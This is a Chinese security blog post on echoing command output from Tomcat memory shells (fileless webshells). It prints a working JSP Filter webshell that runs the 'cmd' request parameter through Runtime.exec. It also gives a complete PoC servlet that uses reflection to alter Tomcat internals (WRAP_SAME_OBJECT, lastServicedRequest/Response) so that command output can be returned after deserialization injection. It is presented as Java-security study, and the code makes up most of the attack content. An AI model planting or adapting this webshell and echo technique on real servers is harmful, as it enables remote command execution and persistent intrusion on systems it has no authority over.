
  <!DOCTYPE html>
  <html lang="zh-CN"  data-theme="dark" >
  <head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script src="https://www.googletagmanager.com/gtag/js?id=true"></script>
  <script data-pjax>
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }

    gtag('js', new Date());

    gtag('config', 'true');
  </script>
  <!-- End Google Analytics -->


  

  
  <script async src="https://hm.baidu.com/hm.js?true"></script>
  <script data-pjax>
    var _hmt = _hmt || [];
    _hmt.push(["_trackPageview", location.pathname]);
  </script>


  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.outdate = {"enable":true,"daysAgo":180,"message":"本文最后更新于 {time}，请注意文中内容可能已经发生变化。"};</script>
  
  
  <title>
    内存马Tomcat回显 |
    
    yyjccc的博客
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  <meta name="description" content="内存马Tomcat回显所谓回显，其实就是获取命令执行的结果，这种技术常用于目标机器不出网，无法反弹shell的情况。其实关键就是获取request和response对象。 参考：  Java安全学习——内存马 - 枫のBlog https:&#x2F;&#x2F;johnfrod.top&#x2F;%e5%ae%89%e5%85%a8&#x2F;java-%e5%9b%9e%e6%98%be%e6%8a%80%e6%9c%af&#x2F; htt">
<meta property="og:type" content="article">
<meta property="og:title" content="内存马Tomcat回显">
<meta property="og:url" content="https://yyjccc.github.io/2024/03/16/%E5%86%85%E5%AD%98%E9%A9%ACTomcat%E5%9B%9E%E6%98%BE/index.html">
<meta property="og:site_name" content="yyjccc的博客">
<meta property="og:description" content="内存马Tomcat回显所谓回显，其实就是获取命令执行的结果，这种技术常用于目标机器不出网，无法反弹shell的情况。其实关键就是获取request和response对象。 参考：  Java安全学习——内存马 - 枫のBlog https:&#x2F;&#x2F;johnfrod.top&#x2F;%e5%ae%89%e5%85%a8&#x2F;java-%e5%9b%9e%e6%98%be%e6%8a%80%e6%9c%af&#x2F; htt">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/1.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/2.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/3.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/4.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/5.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/6.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/7.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/8.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/9.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/10.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/11.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/12.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/13.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/14.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/15.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/16.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/17.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/18.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/19.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/20.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/21.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/22.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/23.png">
<meta property="og:image" content="https://yyjccc.github.io/img/3-16/24.png">
<meta property="article:published_time" content="2024-03-16T10:46:19.806Z">
<meta property="article:modified_time" content="2024-04-23T16:32:06.560Z">
<meta property="article:author" content="Yyjccc">
<meta property="article:tag" content="java安全">
<meta property="article:tag" content="内存马">
<meta property="article:tag" content="Tomcat">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://yyjccc.github.io/img/3-16/1.png">
  
    <link rel="alternate" href="/atom.xml" title="yyjccc的博客" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
    
      
<link rel="stylesheet" href="https://npm.webcache.cn/gitalk/dist/gitalk.css">

    
  
  
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.0.1/dist/aos.css">

  
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

  <body>
    
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff5252" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
         M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="#ff5252" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/">首页</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/archives">归档</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/about">关于</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/friend">友链</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
    
    
    
      <a id="nav-search-btn" class="nav-icon popup-trigger" title="搜索"></a>
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.webp" alt="内存马Tomcat回显">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">内存马Tomcat回显</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content">
          
          <section id="main"><article id="post-内存马Tomcat回显" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2024/03/16/%E5%86%85%E5%AD%98%E9%A9%ACTomcat%E5%9B%9E%E6%98%BE/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2024-03-16T10:46:19.806Z" itemprop="datePublished">2024-03-16</time>
    <time style="display: none;" id="post-update-time">2024-04-24</time>
  </a>
</div>

      
  <div class="article-category">
    <a class="article-category-link" href="/categories/java%E5%AE%89%E5%85%A8/" data-aos="zoom-in">java安全</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
        <blockquote id="outdate-blockquote" style="display: none;"><p></p></blockquote>
      
      
        <h1 id="内存马Tomcat回显"><a href="#内存马Tomcat回显" class="headerlink" title="内存马Tomcat回显"></a>内存马Tomcat回显</h1><p>所谓回显，其实就是获取命令执行的结果，这种技术常用于目标机器不出网，无法反弹shell的情况。<strong>其实关键就是获取request和response对象</strong>。</p>
<p>参考：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://goodapple.top/archives/1355">Java安全学习——内存马 - 枫のBlog</a></li>
<li><a target="_blank" rel="noopener" href="https://johnfrod.top/%e5%ae%89%e5%85%a8/java-%e5%9b%9e%e6%98%be%e6%8a%80%e6%9c%af/">https://johnfrod.top/%e5%ae%89%e5%85%a8/java-%e5%9b%9e%e6%98%be%e6%8a%80%e6%9c%af/</a></li>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12494">https://xz.aliyun.com/t/12494</a><br><a name="MpGXn"></a></li>
</ul>
<h2 id="示例"><a href="#示例" class="headerlink" title="示例"></a>示例</h2><p>我们以上文提到的Tomcat Filter内存马为例，获取对应的回显，关键代码如下</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line">&lt;%! <span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Shell_Filter</span> <span class="keyword">implements</span> <span class="title class_">Filter</span> {</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">doFilter</span><span class="params">(ServletRequest request, ServletResponse response, FilterChain chain)</span> <span class="keyword">throws</span> IOException, ServletException {</span><br><span class="line">        <span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> request.getParameter(<span class="string">"cmd"</span>);</span><br><span class="line">        response.setContentType(<span class="string">"text/html; charset=UTF-8"</span>);</span><br><span class="line">        <span class="type">PrintWriter</span> <span class="variable">writer</span> <span class="operator">=</span> response.getWriter();</span><br><span class="line">        <span class="keyword">if</span> (cmd != <span class="literal">null</span>) {</span><br><span class="line">            <span class="keyword">try</span> {</span><br><span class="line">                <span class="type">InputStream</span> <span class="variable">in</span> <span class="operator">=</span> Runtime.getRuntime().exec(cmd).getInputStream();</span><br><span class="line">                <span class="comment">//将命令执行结果写入扫描器并读取所有输入</span></span><br><span class="line">                <span class="type">Scanner</span> <span class="variable">scanner</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Scanner</span>(in).useDelimiter(<span class="string">"\\A"</span>);</span><br><span class="line">                <span class="type">String</span> <span class="variable">result</span> <span class="operator">=</span> scanner.hasNext()?scanner.next():<span class="string">""</span>;</span><br><span class="line">                scanner.close();</span><br><span class="line">                writer.write(result);</span><br><span class="line">                writer.flush();</span><br><span class="line">                writer.close();</span><br><span class="line">            } <span class="keyword">catch</span> (IOException e) {</span><br><span class="line">                e.printStackTrace();</span><br><span class="line">            } <span class="keyword">catch</span> (NullPointerException n) {</span><br><span class="line">                n.printStackTrace();</span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line">        chain.doFilter(request, response);</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line">%&gt;</span><br></pre></td></tr></tbody></table></figure>
<p>上述方式我们是通过JSP文件来注入内存马的。由于JSP中内置了一些关键对象，所以我们能够很容易地获得Request和Response对象，并能通过他们来获取目标JVM的上下文Context。</p>
<p>针对于反序列化进行内存马注入来达到无文件落地的目的，而jsp的request和response可以直接获取，但是反序列化的时候却不能，所以回显问题便需要考虑其中。<br><a name="QoyvZ"></a></p>
<h2 id="ThreadLocal-Response回显"><a href="#ThreadLocal-Response回显" class="headerlink" title="ThreadLocal Response回显"></a>ThreadLocal Response回显</h2><p>首先要注意的是，我们寻找的request对象应该是一个和当前线程ThreadLocal有关的对象，而不是一个全局变量。这样才能获取到当前线程的相关信息。最终我们能够在org.apache.catalina.core.ApplicationFilterChain类中找到这样两个变量_lastServicedRequest_和_lastServicedResponse_。并且这两个属性还是静态的，我们获取时无需实例化对象。<br><img src="/img/3-16/1.png"><br>在我们熟悉的ApplicationFilterChain#internalDoFilter中，Tomcat会将request对象和response对象存储到这两个变量中</p>
<p>在静态代码块中的ApplicationDispatcher.WRAP_SAME_OBJECT为false，但是我们后续可以通过反射修改。</p>
<img src="/img/3-16/2.png">

<p>在ApplicationFilterChain#internalDoFilter 中发现，当WRAP_SAME_OBJECT为 true时 ，就会通过set方法将请求信息存入 lastServicedRequest 和 lastServicedResponse中</p>
<p>可以总结思路如下</p>
<ol>
<li>反射修改ApplicationDispatcher.WRAP_SAME_OBJECT的值，通过ThreadLocal#set方法将request和response对象存储到变量中</li>
<li>初始化lastServicedRequest和lastServicedResponse两个变量，默认为null</li>
<li>通过ThreadLocal#get方法将request和response对象从_lastServicedRequest_和_lastServicedResponse_中取出</li>
</ol>
<p>反射修改static final<br>参考：<br><a target="_blank" rel="noopener" href="https://johnfrod.top/%e5%ae%89%e5%85%a8/java%e5%8f%8d%e5%b0%84%e4%bf%ae%e6%94%b9static-final%e4%bf%ae%e9%a5%b0%e7%9a%84%e5%ad%97%e6%ae%b5/">https://johnfrod.top/%e5%ae%89%e5%85%a8/java%e5%8f%8d%e5%b0%84%e4%bf%ae%e6%94%b9static-final%e4%bf%ae%e9%a5%b0%e7%9a%84%e5%ad%97%e6%ae%b5/</a></p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">Field</span> <span class="variable">lastServicedResponseField</span> <span class="operator">=</span> ApplicationFilterChain.class.getDeclaredField(<span class="string">"lastServicedResponse"</span>);</span><br><span class="line"><span class="comment">//再次反射修改feild的modif</span></span><br><span class="line"><span class="type">Field</span> <span class="variable">modifiersField</span> <span class="operator">=</span> Field.class.getDeclaredField(<span class="string">"modifiers"</span>);</span><br><span class="line">modifiersField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="comment">//去除final</span></span><br><span class="line">modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() &amp; ~Modifier.FINAL);</span><br><span class="line">lastServicedResponseField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>

<p><a name="R39Ad"></a></p>
<h4 id="反射存储request和response"><a href="#反射存储request和response" class="headerlink" title="反射存储request和response"></a>反射存储request和response</h4><figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">//反射获取所需属性</span></span><br><span class="line"><span class="type">Field</span> <span class="variable">WRAP_SAME_OBJECT_FIELD</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.core.ApplicationDispatcher"</span>).getDeclaredField(<span class="string">"WRAP_SAME_OBJECT"</span>);</span><br><span class="line"><span class="type">Field</span> <span class="variable">lastServicedRequestField</span> <span class="operator">=</span> ApplicationFilterChain.class.getDeclaredField(<span class="string">"lastServicedRequest"</span>);</span><br><span class="line"><span class="type">Field</span> <span class="variable">lastServicedResponseField</span> <span class="operator">=</span> ApplicationFilterChain.class.getDeclaredField(<span class="string">"lastServicedResponse"</span>);</span><br><span class="line"> </span><br><span class="line"><span class="comment">//使用modifiersField反射修改final型变量</span></span><br><span class="line">java.lang.reflect.<span class="type">Field</span> <span class="variable">modifiersField</span> <span class="operator">=</span> Field.class.getDeclaredField(<span class="string">"modifiers"</span>);</span><br><span class="line">modifiersField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">modifiersField.setInt(WRAP_SAME_OBJECT_FIELD, WRAP_SAME_OBJECT_FIELD.getModifiers() &amp; ~Modifier.FINAL);</span><br><span class="line">modifiersField.setInt(lastServicedRequestField, lastServicedRequestField.getModifiers() &amp; ~Modifier.FINAL);</span><br><span class="line">modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() &amp; ~Modifier.FINAL);</span><br><span class="line">WRAP_SAME_OBJECT_FIELD.setAccessible(<span class="literal">true</span>);</span><br><span class="line">lastServicedRequestField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">lastServicedResponseField.setAccessible(<span class="literal">true</span>);</span><br><span class="line"> </span><br><span class="line"><span class="comment">//将变量WRAP_SAME_OBJECT_FIELD设置为true</span></span><br><span class="line"><span class="keyword">if</span> (!WRAP_SAME_OBJECT_FIELD.getBoolean(<span class="literal">null</span>)){</span><br><span class="line">    WRAP_SAME_OBJECT_FIELD.setBoolean(<span class="literal">null</span>,<span class="literal">true</span>);</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p><a name="rGsRw"></a></p>
<h4 id="初始化变量"><a href="#初始化变量" class="headerlink" title="初始化变量"></a>初始化变量</h4><p>由于变量在Tomcat初始化运行的时候会被设置为null，因此我们还需要初始化lastServicedRequest和lastServicedResponse变量为ThreadLocal类</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (lastServicedRequestField.get(<span class="literal">null</span>)==<span class="literal">null</span>){</span><br><span class="line">    lastServicedRequestField.set(<span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">ThreadLocal</span>&lt;&gt;());</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> (lastServicedResponseField.get(<span class="literal">null</span>)==<span class="literal">null</span>){</span><br><span class="line">    lastServicedResponseField.set(<span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">ThreadLocal</span>&lt;&gt;());</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p><a name="jjAuo"></a></p>
<h4 id="获取request、response变量"><a href="#获取request、response变量" class="headerlink" title="获取request、response变量"></a>获取request、response变量</h4><figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(lastServicedRequestField.get(<span class="literal">null</span>)!=<span class="literal">null</span>){</span><br><span class="line">    <span class="type">ThreadLocal</span> <span class="variable">threadLocalReq</span> <span class="operator">=</span> (ThreadLocal) lastServicedRequestField.get(<span class="literal">null</span>);</span><br><span class="line">    <span class="type">ThreadLocal</span> <span class="variable">threadLocalRes</span> <span class="operator">=</span>(ThreadLocal) lastServicedResponseField.get(<span class="literal">null</span>);</span><br><span class="line">    <span class="type">HttpServletRequest</span> <span class="variable">request</span> <span class="operator">=</span> (HttpServletRequest) threadLocalReq.get();</span><br><span class="line">    HttpServletResponse response= (HttpServletResponse) threadLocalRes.get();</span><br><span class="line"></span><br><span class="line">   </span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>请求两次，第一次修改变量值，第二次获取Request<br><a name="HNztX"></a></p>
<h3 id="完整Poc"><a href="#完整Poc" class="headerlink" title="完整Poc"></a>完整Poc</h3><figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">package</span> com.yyjccc.memorytrojan.Echo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.connector.Response;</span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.connector.ResponseFacade;</span><br><span class="line"><span class="keyword">import</span> org.apache.catalina.core.ApplicationFilterChain;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletException;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.annotation.WebServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletResponse;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.PrintWriter;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Modifier;</span><br><span class="line"><span class="keyword">import</span> java.util.Scanner;</span><br><span class="line"></span><br><span class="line"><span class="meta">@WebServlet("/echo")</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Tomcat_Local</span> <span class="keyword">extends</span> <span class="title class_">HttpServlet</span> {</span><br><span class="line">	<span class="meta">@Override</span></span><br><span class="line">	<span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">doGet</span><span class="params">(HttpServletRequest req, HttpServletResponse resp)</span> {</span><br><span class="line"></span><br><span class="line">		<span class="keyword">try</span> {</span><br><span class="line">			<span class="comment">//反射获取所需属性</span></span><br><span class="line">			<span class="type">Field</span> <span class="variable">WRAP_SAME_OBJECT_FIELD</span> <span class="operator">=</span> Class.forName(<span class="string">"org.apache.catalina.core.ApplicationDispatcher"</span>).getDeclaredField(<span class="string">"WRAP_SAME_OBJECT"</span>);</span><br><span class="line">			<span class="type">Field</span> <span class="variable">lastServicedRequestField</span> <span class="operator">=</span> ApplicationFilterChain.class.getDeclaredField(<span class="string">"lastServicedRequest"</span>);</span><br><span class="line">			<span class="type">Field</span> <span class="variable">lastServicedResponseField</span> <span class="operator">=</span> ApplicationFilterChain.class.getDeclaredField(<span class="string">"lastServicedResponse"</span>);</span><br><span class="line">			<span class="comment">//使用modifiersField反射修改final型变量</span></span><br><span class="line">			java.lang.reflect.<span class="type">Field</span> <span class="variable">modifiersField</span> <span class="operator">=</span> Field.class.getDeclaredField(<span class="string">"modifiers"</span>);</span><br><span class="line">			modifiersField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			modifiersField.setInt(WRAP_SAME_OBJECT_FIELD, WRAP_SAME_OBJECT_FIELD.getModifiers() &amp; ~Modifier.FINAL);</span><br><span class="line">			modifiersField.setInt(lastServicedRequestField, lastServicedRequestField.getModifiers() &amp; ~Modifier.FINAL);</span><br><span class="line">			modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() &amp; ~Modifier.FINAL);</span><br><span class="line">			WRAP_SAME_OBJECT_FIELD.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			lastServicedRequestField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			lastServicedResponseField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">			<span class="comment">//将变量WRAP_SAME_OBJECT_FIELD设置为true，并初始化lastServicedRequest和lastServicedResponse变量</span></span><br><span class="line">			<span class="comment">//第一次请求进行初始化</span></span><br><span class="line">			<span class="keyword">if</span> (!WRAP_SAME_OBJECT_FIELD.getBoolean(<span class="literal">null</span>)){</span><br><span class="line">				WRAP_SAME_OBJECT_FIELD.setBoolean(<span class="literal">null</span>,<span class="literal">true</span>);</span><br><span class="line">			}</span><br><span class="line">			<span class="keyword">if</span> (lastServicedRequestField.get(<span class="literal">null</span>)==<span class="literal">null</span>){</span><br><span class="line">				lastServicedRequestField.set(<span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">ThreadLocal</span>&lt;&gt;());</span><br><span class="line">			}</span><br><span class="line">			<span class="keyword">if</span> (lastServicedResponseField.get(<span class="literal">null</span>)==<span class="literal">null</span>){</span><br><span class="line">				lastServicedResponseField.set(<span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">ThreadLocal</span>&lt;&gt;());</span><br><span class="line">			}</span><br><span class="line">			<span class="comment">//第二次请求获取request变量</span></span><br><span class="line">			<span class="keyword">if</span>(lastServicedRequestField.get(<span class="literal">null</span>)!=<span class="literal">null</span>){</span><br><span class="line">				<span class="type">ThreadLocal</span> <span class="variable">threadLocalReq</span> <span class="operator">=</span> (ThreadLocal) lastServicedRequestField.get(<span class="literal">null</span>);</span><br><span class="line">				<span class="type">ThreadLocal</span> <span class="variable">threadLocalRes</span> <span class="operator">=</span>(ThreadLocal) lastServicedResponseField.get(<span class="literal">null</span>);</span><br><span class="line">				<span class="type">HttpServletRequest</span> <span class="variable">request</span> <span class="operator">=</span> (HttpServletRequest) threadLocalReq.get();</span><br><span class="line">				HttpServletResponse response= (HttpServletResponse) threadLocalRes.get();</span><br><span class="line">				<span class="keyword">if</span>(request!=<span class="literal">null</span> || response!=<span class="literal">null</span>){</span><br><span class="line">					cmdEcho(request,response);</span><br><span class="line">				}</span><br><span class="line">			}</span><br><span class="line">		} <span class="keyword">catch</span> (NoSuchFieldException | IllegalAccessException | ClassNotFoundException e) {</span><br><span class="line">			e.printStackTrace();</span><br><span class="line">		}</span><br><span class="line">	}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span>  <span class="keyword">void</span> <span class="title function_">cmdEcho</span><span class="params">(HttpServletRequest request,HttpServletResponse response)</span>{</span><br><span class="line">		PrintWriter writer;</span><br><span class="line">		response.setCharacterEncoding(<span class="string">"gbk"</span>);</span><br><span class="line">		<span class="keyword">try</span> {</span><br><span class="line">			writer = response.getWriter();</span><br><span class="line">			<span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> request.getParameter(<span class="string">"cmd"</span>);</span><br><span class="line">			InputStream inputStream;</span><br><span class="line">			<span class="keyword">if</span>(cmd!=<span class="literal">null</span>){</span><br><span class="line">				inputStream = Runtime.getRuntime().exec(cmd).getInputStream();</span><br><span class="line">				<span class="type">Scanner</span> <span class="variable">scanner</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Scanner</span>(inputStream).useDelimiter(<span class="string">"\\A"</span>);</span><br><span class="line">				<span class="type">String</span> <span class="variable">result</span> <span class="operator">=</span> scanner.hasNext()?scanner.next():<span class="string">""</span>;</span><br><span class="line">				scanner.close();</span><br><span class="line">				writer.write(result);</span><br><span class="line">				writer.flush();</span><br><span class="line">				writer.close();</span><br><span class="line">			}</span><br><span class="line"></span><br><span class="line">		} <span class="keyword">catch</span> (IOException e) {</span><br><span class="line">			<span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(e);</span><br><span class="line">		}</span><br><span class="line">	}</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>
<p><a name="FIhHd"></a></p>
<h3 id="局限性"><a href="#局限性" class="headerlink" title="局限性"></a>局限性</h3><p>如果漏洞在ApplicationFilterChain获取回显Response代码之前，那么就无法获取到Tomcat Response进行回显。如Shiro RememberMe反序列化漏洞，因为Shiro的RememberMe功能实际上就是一个自定义的Filter。我们知道在ApplicationFilterChain#internalDoFilter方法中，doFilter方法实际上是在我们获取response之前的。因此在Shiro漏洞环境下我们无法通过这种方式获得回显。</p>
<p><a name="plH79"></a></p>
<h2 id="通过全局存储Response回显"><a href="#通过全局存储Response回显" class="headerlink" title="通过全局存储Response回显"></a>通过全局存储Response回显</h2><p>Servlet容器是Java Web的核心，因此很多框架对于该容器都进行了一定程度的封装。不同框架、同一框架的不同版本的实现都有可能不同，因此我们很难找到一种通用的获取回显的方法。<br>比如我们上文通过ThreadLocal类来获取回显的方式就无法适用于Shiro框架下，那么我们能不能换一种思路，寻找Tomcat中全局存储的Request和Response</p>
<p>request和response对象必须是属于当前线程的，因此通过全局存储获取回显的关键就在于找到当前代码运行的上下文和Tomcat运行上下文的联系<br><a name="WgmNT"></a></p>
<h3 id="调用栈分析"><a href="#调用栈分析" class="headerlink" title="调用栈分析"></a>调用栈分析</h3><p>首先我们先来寻找一下Tomcat中的一些全局Response。在AbstractProcessor类中，我们能够找到全局response<br><img src="/img/3-16/3.png"><br>再来看看一个Servlet的调用栈<br><img src="/img/3-16/4.png"></p>
